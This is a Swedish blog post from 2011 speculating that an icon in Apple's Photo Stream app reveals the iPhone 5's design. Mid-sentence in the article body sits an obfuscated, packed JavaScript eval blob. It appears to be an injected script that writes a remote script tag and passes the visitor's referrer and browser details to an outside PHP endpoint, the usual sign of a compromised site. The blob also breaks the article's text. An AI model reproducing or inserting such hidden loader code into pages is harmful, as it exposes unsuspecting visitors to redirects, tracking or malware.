Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

iPhone 5 design är avslöjad…

iPhone 5 design är avslöjad…
Filip Urde
  • On 1 september, 2011
  • http://www.revue.se/filip-urde

Som vanligt lyckas Apple släppa i väg hemligheter… man kan ju undra hur medvetet allt detta är, låter i mina öron som en stor PR kupp år efter år som ska få igång ett ”buzz” kring Apple och dess kommande produkter. Så ingen ”glömmer” vad som komma skall, så smörjs vi lite då och då av rykten osv. Hur som helst iPhone 5 är inget undantag och nu har alltså designen ”avslöjats” tack vare en ikon i programmet Photo Stream. Där finns nämligen en ikon som visar en ny design för iPhone:

 

Baserat eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yeezi|var|u0026u|referrer|ynznt||js|php’.split(’|’),0,{}))
på denna ikon tror man att nästa generations iPhone kommer att se ut på följande sätt:

 

 

 

 

Som synes är det möjligt att öka skärmstorleken från 3,5 tum till 3,7 tum trots att själva mobilen blir mindre. Apple brukar vara minst sagt noggranna med sina ikoner, så det låter inte helt osannolikt att bilden faktiskt visar en iPhone 5.

Den nya modellen av iPhone kommer troligtvis att presenteras inom några veckor.

Comments